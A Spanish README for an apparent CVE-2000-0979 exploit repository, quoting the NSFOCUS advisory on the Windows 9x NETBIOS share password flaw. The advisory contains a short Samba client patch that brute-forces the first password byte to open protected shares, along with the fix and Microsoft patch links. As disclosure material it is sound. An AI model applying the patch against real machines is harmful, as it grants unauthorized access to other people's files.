
CVE-2000-0979
CVE-2000-0979.rb es la herramienta independiente para explotar CVE-2000-0979 contra el servicio SMB de Windows 95.
msf_2000_0979.rb es el módulo de Metasploit. Puedes copiarlo en metasploit-framework ▸ modules ▸ auxiliary ▸ scanner ▸ smb

¡Más documentación próximamente!
NSFOCUS Security Advisory(SA2000-05)
Tema: Vulnerabilidad en la verificación de contraseña NETBIOS de Microsoft Windows 9x
Fecha de publicación: 24 de agosto de 2000 Fecha de actualización: 11 de octubre de 2000
Existe una vulnerabilidad en el esquema de verificación de contraseña utilizado por la implementación del protocolo NETBIOS de Microsoft Windows 9x. Esta vulnerabilidad permitirá a cualquier usuario acceder al servicio de uso compartido de archivos de Windows 9x con protección por contraseña. El atacante no necesita conocer la contraseña del recurso compartido.
Puedes establecer una contraseña para proteger los recursos compartidos del sistema Microsoft Windows 9x. Pero existe una vulnerabilidad en el esquema de verificación de contraseña utilizado por la implementación del protocolo NETBIOS de Microsoft Windows 9x. Para verificar la contraseña, la longitud de la contraseña depende de la longitud de los datos enviados desde el cliente al servidor. Es decir, si un cliente establece la longitud de la contraseña en un byte y envía el paquete con la contraseña en texto plano al servidor, el servidor solo la comparará con el primer byte de la contraseña compartida (texto plano) y, si coinciden, el proceso de verificación se completa. Todo lo que un atacante necesita hacer es adivinar y probar el primer byte de la contraseña en la víctima. El sistema de administración remota de Windows 9x también se ve afectado porque adopta el mismo método de autenticación de contraseña compartida.
Aquí tienes un ejemplo sencillo para demostrar este fallo. Obtén el paquete fuente de samba y modifica source/client/client.c así:
--- samba-2.0.6.orig/source/client/client.c Thu Nov 11 10:35:59 1999
+++ samba-2.0.6/source/client/client.c Mon Sep 18 21:20:29 2000
@@ -1961,12 +1961,22 @@ struct cli_state *do_connect(char *serve
DEBUG(4,(" session setup ok\n"));
+/*
if (!cli_send_tconX(c, share, "?????",
password, strlen(password)+1)) {
DEBUG(0,("tree connect failed: %s\n", cli_errstr(c)));
cli_shutdown(c);
return NULL;
}
+*/
+
+ password[0] = 0;
+ c->sec_mode = 0;
+ do{
+
+ password[0]+=1;
+
+ }while(!cli_send_tconX(c, share, "?????", password, 1));
DEBUG(4,(" tconx ok\n"));
Cierra el servicio compartido de Archivos e Impresoras de Microsoft.
Microsoft ha sido informado y ha publicado un boletín de seguridad sobre este fallo.
El boletín está disponible en :
http://www.microsoft.com/technet/security/bulletin/MS00-072.asp
Los parches están disponibles en:
. Microsoft Windows 95
Parche disponible próximamente
. Microsoft Windows 98 y 98 Second Edition
http://download.microsoft.com/download/win98SE/Update/11958/W98/EN-US/273991USA8.EXE
. Microsoft Windows Me
http://download.microsoft.com/download/winme/Update/11958/WinMe/EN-US/273991USAM.EXE
LA INFORMACIÓN PROPORCIONADA ES PUBLICADA POR NSFOCUS "TAL CUAL", SIN GARANTÍA DE NINGÚN TIPO. NSFOCUS RECHAZA TODAS LAS GARANTÍAS, YA SEAN EXPRESAS O IMPLÍCITAS, EXCEPTO LAS GARANTÍAS DE COMERCIABILIDAD. EN NINGÚN CASO NSFOCUS SERÁ RESPONSABLE DE DAÑO ALGUNO, INCLUIDOS LOS DAÑOS DIRECTOS, INDIRECTOS, INCIDENTALES, CONSECUENTES, PÉRDIDA DE BENEFICIOS COMERCIALES O DAÑOS ESPECIALES, INCLUSO SI NSFOCUS HA SIDO ADVERTIDO DE LA POSIBILIDAD DE TALES DAÑOS. LA DISTRIBUCIÓN O REPRODUCCIÓN DE LA INFORMACIÓN SE PERMITE SIEMPRE QUE EL AVISO NO SEA MODIFICADO DE NINGUNA MANERA.
?Copyright 1999-2000 NSFOCUS. Todos los derechos reservados. Términos de uso.
NSFOCUS Security Team [email protected] NSFOCUS INFORMATION TECHNOLOGY CO.,LTD (http://www.nsfocus.com)